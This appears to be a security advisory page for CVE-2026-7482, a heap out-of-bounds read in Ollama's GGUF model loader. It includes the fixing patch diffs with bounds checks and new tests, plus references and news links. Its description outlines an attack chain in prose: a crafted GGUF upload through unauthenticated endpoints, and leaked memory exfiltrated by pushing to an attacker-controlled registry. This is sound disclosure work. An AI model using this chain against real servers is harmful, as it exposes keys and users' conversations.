CVE-2026-7482
Description
Ollama before 0.17.1 contains a heap out-of-bounds read vulnerability in the GGUF model loader. The /api/create endpoint accepts an attacker-supplied GGUF file in which the declared tensor offset and size exceed the file's actual length; during quantization in fs/ggml/gguf.go and server/quantization.go (WriteTo()), the server reads past the allocated heap buffer. The leaked memory contents may include environment variables, API keys, system prompts, and concurrent users' conversation data, and can be exfiltrated by uploading the resulting model artifact through the /api/push endpoint to an attacker-controlled registry. The /api/create and /api/push endpoints have no authentication in the upstream distribution. Default deployments bind to 127.0.0.1, but the documented OLLAMA_HOST=0.0.0.0 configuration is widely used in practice (large public-internet exposure observed).
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
github.com/ollama/ollamaGo | < 0.17.1 | 0.17.1 |
Affected products
1Patches
288d57d0483ccggml: ensure tensor size is valid
4 files changed · +96 −10
fs/ggml/gguf.go+15 −0 modified@@ -245,7 +245,22 @@ func (llm *gguf) Decode(rs io.ReadSeeker) error { padding := ggufPadding(offset, int64(alignment)) llm.tensorOffset = uint64(offset + padding) + // get file size to validate tensor bounds + fileSize, err := rs.Seek(0, io.SeekEnd) + if err != nil { + return fmt.Errorf("failed to determine file size: %w", err) + } + + if _, err := rs.Seek(offset, io.SeekStart); err != nil { + return fmt.Errorf("failed to seek back after size check: %w", err) + } + for _, tensor := range llm.tensors { + tensorEnd := llm.tensorOffset + tensor.Offset + tensor.Size() + if tensorEnd > uint64(fileSize) { + return fmt.Errorf("tensor %q offset+size (%d) exceeds file size (%d)", tensor.Name, tensorEnd, fileSize) + } + offset, err := rs.Seek(0, io.SeekCurrent) if err != nil { return fmt.Errorf("failed to get current offset: %w", err)
fs/ggml/gguf_test.go+38 −10 modified@@ -11,21 +11,21 @@ import ( ) func TestWriteGGUF(t *testing.T) { - b := bytes.NewBuffer(make([]byte, 2*3)) + tensorData := make([]byte, 2*3*4) // 6 F32 elements = 24 bytes for range 8 { t.Run("shuffle", func(t *testing.T) { t.Parallel() ts := []*Tensor{ - {Name: "token_embd.weight", Shape: []uint64{2, 3}, WriterTo: b}, - {Name: "blk.0.ffn_norm.weight", Shape: []uint64{2, 3}, WriterTo: b}, - {Name: "blk.0.attn_norm.weight", Shape: []uint64{2, 3}, WriterTo: b}, - {Name: "blk.1.ffn_up.weight", Shape: []uint64{2, 3}, WriterTo: b}, - {Name: "blk.2.ffn_norm.weight", Shape: []uint64{2, 3}, WriterTo: b}, - {Name: "blk.1.ffn_down.weight", Shape: []uint64{2, 3}, WriterTo: b}, - {Name: "blk.0.attn_k.weight", Shape: []uint64{2, 3}, WriterTo: b}, - {Name: "output_norm.weight", Shape: []uint64{3, 2}, WriterTo: b}, - {Name: "output.weight", Shape: []uint64{3, 2}, WriterTo: b}, + {Name: "token_embd.weight", Shape: []uint64{2, 3}, WriterTo: bytes.NewReader(tensorData)}, + {Name: "blk.0.ffn_norm.weight", Shape: []uint64{2, 3}, WriterTo: bytes.NewReader(tensorData)}, + {Name: "blk.0.attn_norm.weight", Shape: []uint64{2, 3}, WriterTo: bytes.NewReader(tensorData)}, + {Name: "blk.1.ffn_up.weight", Shape: []uint64{2, 3}, WriterTo: bytes.NewReader(tensorData)}, + {Name: "blk.2.ffn_norm.weight", Shape: []uint64{2, 3}, WriterTo: bytes.NewReader(tensorData)}, + {Name: "blk.1.ffn_down.weight", Shape: []uint64{2, 3}, WriterTo: bytes.NewReader(tensorData)}, + {Name: "blk.0.attn_k.weight", Shape: []uint64{2, 3}, WriterTo: bytes.NewReader(tensorData)}, + {Name: "output_norm.weight", Shape: []uint64{3, 2}, WriterTo: bytes.NewReader(tensorData)}, + {Name: "output.weight", Shape: []uint64{3, 2}, WriterTo: bytes.NewReader(tensorData)}, } rand.Shuffle(len(ts), func(i, j int) { @@ -98,4 +98,32 @@ func TestWriteGGUF(t *testing.T) { } }) } + + t.Run("truncated_tensor_data", func(t *testing.T) { + t.Parallel() + + ts := []*Tensor{ + {Name: "blk.0.attn.weight", Kind: 0, Shape: []uint64{512, 2}, WriterTo: bytes.NewBuffer(make([]byte, 32))}, + } + + w, err := os.CreateTemp(t.TempDir(), "truncated_*.bin") + if err != nil { + t.Fatal(err) + } + defer w.Close() + + if err := WriteGGUF(w, KV{"general.architecture": "test"}, ts); err != nil { + t.Fatal(err) + } + + r, err := os.Open(w.Name()) + if err != nil { + t.Fatal(err) + } + defer r.Close() + + if _, err := Decode(r, -1); err == nil { + t.Error("Decode should reject GGUF files where tensor data extends beyond file size") + } + }) }
server/quantization.go+3 −0 modified@@ -33,6 +33,9 @@ func (q quantizer) WriteTo(w io.Writer) (int64, error) { slog.Warn("file read error", "tensor", q.from.Name, "file", q.Name(), "error", err) return 0, fmt.Errorf("unable to read tensor %s from %s: %s", q.from.Name, q.Name(), err) } + if uint64(len(data)) < q.from.Size() { + return 0, fmt.Errorf("tensor %s data size %d is less than expected %d from shape %v", q.from.Name, len(data), q.from.Size(), q.from.Shape) + } var f32s []float32 newType := fsggml.TensorType(q.to.Kind) if fsggml.TensorType(q.from.Kind) == fsggml.TensorTypeF32 {
server/quantization_test.go+40 −0 modified@@ -173,6 +173,7 @@ func TestQuantizeModel(t *testing.T) { tensors []*fsggml.Tensor newType string expectedTensorTypes map[string]fsggml.TensorType + expectErr bool }{ { name: "f16_q4_k", @@ -253,6 +254,36 @@ func TestQuantizeModel(t *testing.T) { "output.weight": fsggml.TensorTypeQ8_0, }, }, + { + name: "f32_short_data", + kv: map[string]any{ + "general.architecture": "foo", + }, + tensors: []*fsggml.Tensor{ + { + Name: "blk.0.attn.weight", Kind: uint32(fsggml.TensorTypeF32), + Offset: uint64(0), Shape: []uint64{512, 2}, + WriterTo: bytes.NewReader(make([]byte, 32)), + }, + }, + newType: "Q4_K", + expectErr: true, + }, + { + name: "f16_short_data", + kv: map[string]any{ + "general.architecture": "foo", + }, + tensors: []*fsggml.Tensor{ + { + Name: "blk.0.attn.weight", Kind: uint32(fsggml.TensorTypeF16), + Offset: uint64(0), Shape: []uint64{512, 2}, + WriterTo: bytes.NewReader(make([]byte, 32)), + }, + }, + newType: "Q4_K", + expectErr: true, + }, } for _, tt := range cases { @@ -264,6 +295,9 @@ func TestQuantizeModel(t *testing.T) { } defer fp.Close() meta, err := fsggml.Decode(fp, -1) + if tt.expectErr && err != nil { + return + } if err != nil { t.Fatal(err.Error()) } @@ -283,6 +317,12 @@ func TestQuantizeModel(t *testing.T) { } err = quantize(fp, tmp, meta, ftype, progress) + if tt.expectErr { + if err == nil { + t.Fatal("expected quantize to return an error") + } + return + } if err != nil { t.Fatalf("error during quantize: %s", err) }
9d902d63ce9eggml: ensure tensor size is valid (#14406)
4 files changed · +96 −10
fs/ggml/gguf.go+15 −0 modified@@ -245,7 +245,22 @@ func (llm *gguf) Decode(rs io.ReadSeeker) error { padding := ggufPadding(offset, int64(alignment)) llm.tensorOffset = uint64(offset + padding) + // get file size to validate tensor bounds + fileSize, err := rs.Seek(0, io.SeekEnd) + if err != nil { + return fmt.Errorf("failed to determine file size: %w", err) + } + + if _, err := rs.Seek(offset, io.SeekStart); err != nil { + return fmt.Errorf("failed to seek back after size check: %w", err) + } + for _, tensor := range llm.tensors { + tensorEnd := llm.tensorOffset + tensor.Offset + tensor.Size() + if tensorEnd > uint64(fileSize) { + return fmt.Errorf("tensor %q offset+size (%d) exceeds file size (%d)", tensor.Name, tensorEnd, fileSize) + } + offset, err := rs.Seek(0, io.SeekCurrent) if err != nil { return fmt.Errorf("failed to get current offset: %w", err)
fs/ggml/gguf_test.go+38 −10 modified@@ -11,21 +11,21 @@ import ( ) func TestWriteGGUF(t *testing.T) { - b := bytes.NewBuffer(make([]byte, 2*3)) + tensorData := make([]byte, 2*3*4) // 6 F32 elements = 24 bytes for range 8 { t.Run("shuffle", func(t *testing.T) { t.Parallel() ts := []*Tensor{ - {Name: "token_embd.weight", Shape: []uint64{2, 3}, WriterTo: b}, - {Name: "blk.0.ffn_norm.weight", Shape: []uint64{2, 3}, WriterTo: b}, - {Name: "blk.0.attn_norm.weight", Shape: []uint64{2, 3}, WriterTo: b}, - {Name: "blk.1.ffn_up.weight", Shape: []uint64{2, 3}, WriterTo: b}, - {Name: "blk.2.ffn_norm.weight", Shape: []uint64{2, 3}, WriterTo: b}, - {Name: "blk.1.ffn_down.weight", Shape: []uint64{2, 3}, WriterTo: b}, - {Name: "blk.0.attn_k.weight", Shape: []uint64{2, 3}, WriterTo: b}, - {Name: "output_norm.weight", Shape: []uint64{3, 2}, WriterTo: b}, - {Name: "output.weight", Shape: []uint64{3, 2}, WriterTo: b}, + {Name: "token_embd.weight", Shape: []uint64{2, 3}, WriterTo: bytes.NewReader(tensorData)}, + {Name: "blk.0.ffn_norm.weight", Shape: []uint64{2, 3}, WriterTo: bytes.NewReader(tensorData)}, + {Name: "blk.0.attn_norm.weight", Shape: []uint64{2, 3}, WriterTo: bytes.NewReader(tensorData)}, + {Name: "blk.1.ffn_up.weight", Shape: []uint64{2, 3}, WriterTo: bytes.NewReader(tensorData)}, + {Name: "blk.2.ffn_norm.weight", Shape: []uint64{2, 3}, WriterTo: bytes.NewReader(tensorData)}, + {Name: "blk.1.ffn_down.weight", Shape: []uint64{2, 3}, WriterTo: bytes.NewReader(tensorData)}, + {Name: "blk.0.attn_k.weight", Shape: []uint64{2, 3}, WriterTo: bytes.NewReader(tensorData)}, + {Name: "output_norm.weight", Shape: []uint64{3, 2}, WriterTo: bytes.NewReader(tensorData)}, + {Name: "output.weight", Shape: []uint64{3, 2}, WriterTo: bytes.NewReader(tensorData)}, } rand.Shuffle(len(ts), func(i, j int) { @@ -98,4 +98,32 @@ func TestWriteGGUF(t *testing.T) { } }) } + + t.Run("truncated_tensor_data", func(t *testing.T) { + t.Parallel() + + ts := []*Tensor{ + {Name: "blk.0.attn.weight", Kind: 0, Shape: []uint64{512, 2}, WriterTo: bytes.NewBuffer(make([]byte, 32))}, + } + + w, err := os.CreateTemp(t.TempDir(), "truncated_*.bin") + if err != nil { + t.Fatal(err) + } + defer w.Close() + + if err := WriteGGUF(w, KV{"general.architecture": "test"}, ts); err != nil { + t.Fatal(err) + } + + r, err := os.Open(w.Name()) + if err != nil { + t.Fatal(err) + } + defer r.Close() + + if _, err := Decode(r, -1); err == nil { + t.Error("Decode should reject GGUF files where tensor data extends beyond file size") + } + }) }
server/quantization.go+3 −0 modified@@ -33,6 +33,9 @@ func (q quantizer) WriteTo(w io.Writer) (int64, error) { slog.Warn("file read error", "tensor", q.from.Name, "file", q.Name(), "error", err) return 0, fmt.Errorf("unable to read tensor %s from %s: %s", q.from.Name, q.Name(), err) } + if uint64(len(data)) < q.from.Size() { + return 0, fmt.Errorf("tensor %s data size %d is less than expected %d from shape %v", q.from.Name, len(data), q.from.Size(), q.from.Shape) + } var f32s []float32 newType := fsggml.TensorType(q.to.Kind) if fsggml.TensorType(q.from.Kind) == fsggml.TensorTypeF32 {
server/quantization_test.go+40 −0 modified@@ -173,6 +173,7 @@ func TestQuantizeModel(t *testing.T) { tensors []*fsggml.Tensor newType string expectedTensorTypes map[string]fsggml.TensorType + expectErr bool }{ { name: "f16_q4_k", @@ -253,6 +254,36 @@ func TestQuantizeModel(t *testing.T) { "output.weight": fsggml.TensorTypeQ8_0, }, }, + { + name: "f32_short_data", + kv: map[string]any{ + "general.architecture": "foo", + }, + tensors: []*fsggml.Tensor{ + { + Name: "blk.0.attn.weight", Kind: uint32(fsggml.TensorTypeF32), + Offset: uint64(0), Shape: []uint64{512, 2}, + WriterTo: bytes.NewReader(make([]byte, 32)), + }, + }, + newType: "Q4_K", + expectErr: true, + }, + { + name: "f16_short_data", + kv: map[string]any{ + "general.architecture": "foo", + }, + tensors: []*fsggml.Tensor{ + { + Name: "blk.0.attn.weight", Kind: uint32(fsggml.TensorTypeF16), + Offset: uint64(0), Shape: []uint64{512, 2}, + WriterTo: bytes.NewReader(make([]byte, 32)), + }, + }, + newType: "Q4_K", + expectErr: true, + }, } for _, tt := range cases { @@ -264,6 +295,9 @@ func TestQuantizeModel(t *testing.T) { } defer fp.Close() meta, err := fsggml.Decode(fp, -1) + if tt.expectErr && err != nil { + return + } if err != nil { t.Fatal(err.Error()) } @@ -283,6 +317,12 @@ func TestQuantizeModel(t *testing.T) { } err = quantize(fp, tmp, meta, ftype, progress) + if tt.expectErr { + if err == nil { + t.Fatal("expected quantize to return an error") + } + return + } if err != nil { t.Fatalf("error during quantize: %s", err) }
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
5- github.com/ollama/ollama/commit/88d57d0483cca907e0b23a968c83627a20b21047nvdPatchWEB
- github.com/ollama/ollama/pull/14406nvdIssue TrackingPatchWEB
- github.com/advisories/GHSA-x8qc-fggm-mpqgghsaADVISORY
- nvd.nist.gov/vuln/detail/CVE-2026-7482ghsaADVISORY
- github.com/ollama/ollama/releases/tag/v0.17.1nvdRelease NotesWEB
News mentions
4- Ollama Out-of-Bounds Read Vulnerability Allows Remote Process Memory LeakThe Hacker News · May 10, 2026
- Unpatched flaws turn Ollama’s auto-updater into a persistent RCE vector, researchers sayHelp Net Security · May 5, 2026
- Critical Bug Could Expose 300,000 Ollama Deployments to Information TheftSecurityWeek · May 5, 2026
- AI Threat Landscape Digest January-February 2026Check Point Research · Mar 29, 2026